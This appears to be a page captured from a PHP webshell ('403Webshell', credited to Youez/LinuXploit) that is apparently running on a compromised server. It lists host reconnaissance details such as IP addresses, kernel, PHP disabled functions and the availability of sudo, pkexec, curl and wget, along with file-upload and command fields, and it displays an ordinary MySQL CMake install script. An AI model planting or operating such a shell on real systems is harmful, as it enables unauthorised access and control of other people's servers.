403Webshell
Server IP : 172.67.216.182  /  Your IP : 162.158.88.30
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/mysql/src/install/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/mysql/src/install/include//cmake_install.cmake
# Install script for directory: /www/server/mysql/src/include

# Set the install prefix
if(NOT DEFINED CMAKE_INSTALL_PREFIX)
  set(CMAKE_INSTALL_PREFIX "/www/server/mysql")
endif()
string(REGEX REPLACE "/$" "" CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}")

# Set the install configuration name.
if(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)
  if(BUILD_TYPE)
    string(REGEX REPLACE "^[^A-Za-z0-9_]+" ""
           CMAKE_INSTALL_CONFIG_NAME "${BUILD_TYPE}")
  else()
    set(CMAKE_INSTALL_CONFIG_NAME "RelWithDebInfo")
  endif()
  message(STATUS "Install configuration: \"${CMAKE_INSTALL_CONFIG_NAME}\"")
endif()

# Set the component getting installed.
if(NOT CMAKE_INSTALL_COMPONENT)
  if(COMPONENT)
    message(STATUS "Install component: \"${COMPONENT}\"")
    set(CMAKE_INSTALL_COMPONENT "${COMPONENT}")
  else()
    set(CMAKE_INSTALL_COMPONENT)
  endif()
endif()

# Install shared libraries without execute permission?
if(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)
  set(CMAKE_INSTALL_SO_NO_EXE "1")
endif()

# Is this installation the result of a crosscompile?
if(NOT DEFINED CMAKE_CROSSCOMPILING)
  set(CMAKE_CROSSCOMPILING "FALSE")
endif()

# Set default install directory permissions.
if(NOT DEFINED CMAKE_OBJDUMP)
  set(CMAKE_OBJDUMP "/bin/objdump")
endif()

if("x${CMAKE_INSTALL_COMPONENT}x" STREQUAL "xDevelopmentx" OR NOT CMAKE_INSTALL_COMPONENT)
  file(INSTALL DESTINATION "${CMAKE_INSTALL_PREFIX}/include" TYPE FILE FILES "/www/server/mysql/src/include/../libbinlogevents/export/binary_log_types.h")
endif()

if("x${CMAKE_INSTALL_COMPONENT}x" STREQUAL "xDevelopmentx" OR NOT CMAKE_INSTALL_COMPONENT)
  file(INSTALL DESTINATION "${CMAKE_INSTALL_PREFIX}/include" TYPE FILE FILES
    "/www/server/mysql/src/include/mysql.h"
    "/www/server/mysql/src/include/mysql_com.h"
    "/www/server/mysql/src/include/my_command.h"
    "/www/server/mysql/src/include/mysql_time.h"
    "/www/server/mysql/src/include/my_list.h"
    "/www/server/mysql/src/include/my_alloc.h"
    "/www/server/mysql/src/include/typelib.h"
    "/www/server/mysql/src/include/mysql/plugin.h"
    "/www/server/mysql/src/include/mysql/plugin_audit.h"
    "/www/server/mysql/src/include/mysql/plugin_ftparser.h"
    "/www/server/mysql/src/include/mysql/plugin_validate_password.h"
    "/www/server/mysql/src/include/mysql/plugin_keyring.h"
    "/www/server/mysql/src/include/mysql/plugin_group_replication.h"
    "/www/server/mysql/src/include/my_dbug.h"
    "/www/server/mysql/src/include/m_string.h"
    "/www/server/mysql/src/include/my_sys.h"
    "/www/server/mysql/src/include/my_xml.h"
    "/www/server/mysql/src/include/mysql_embed.h"
    "/www/server/mysql/src/include/my_thread.h"
    "/www/server/mysql/src/include/my_thread_local.h"
    "/www/server/mysql/src/include/decimal.h"
    "/www/server/mysql/src/include/errmsg.h"
    "/www/server/mysql/src/include/my_global.h"
    "/www/server/mysql/src/include/my_getopt.h"
    "/www/server/mysql/src/include/sslopt-longopts.h"
    "/www/server/mysql/src/include/my_dir.h"
    "/www/server/mysql/src/include/sslopt-vars.h"
    "/www/server/mysql/src/include/sslopt-case.h"
    "/www/server/mysql/src/include/sql_common.h"
    "/www/server/mysql/src/include/keycache.h"
    "/www/server/mysql/src/include/m_ctype.h"
    "/www/server/mysql/src/include/my_compiler.h"
    "/www/server/mysql/src/include/mysql_com_server.h"
    "/www/server/mysql/src/include/my_byteorder.h"
    "/www/server/mysql/src/include/byte_order_generic.h"
    "/www/server/mysql/src/include/byte_order_generic_x86.h"
    "/www/server/mysql/src/include/little_endian.h"
    "/www/server/mysql/src/include/big_endian.h"
    "/www/server/mysql/src/include/thr_cond.h"
    "/www/server/mysql/src/include/thr_mutex.h"
    "/www/server/mysql/src/include/thr_rwlock.h"
    "/www/server/mysql/src/install/include/mysql_version.h"
    "/www/server/mysql/src/install/include/my_config.h"
    "/www/server/mysql/src/install/include/mysqld_ername.h"
    "/www/server/mysql/src/install/include/mysqld_error.h"
    "/www/server/mysql/src/install/include/sql_state.h"
    )
endif()

if("x${CMAKE_INSTALL_COMPONENT}x" STREQUAL "xDevelopmentx" OR NOT CMAKE_INSTALL_COMPONENT)
  file(INSTALL DESTINATION "${CMAKE_INSTALL_PREFIX}/include/mysql" TYPE DIRECTORY FILES "/www/server/mysql/src/include/mysql/" REGEX "/[^/]*\\.h$" REGEX "/psi\\_abi[^/]*$" EXCLUDE)
endif()


Youez - 2016 - github.com/yon3zu
LinuXploit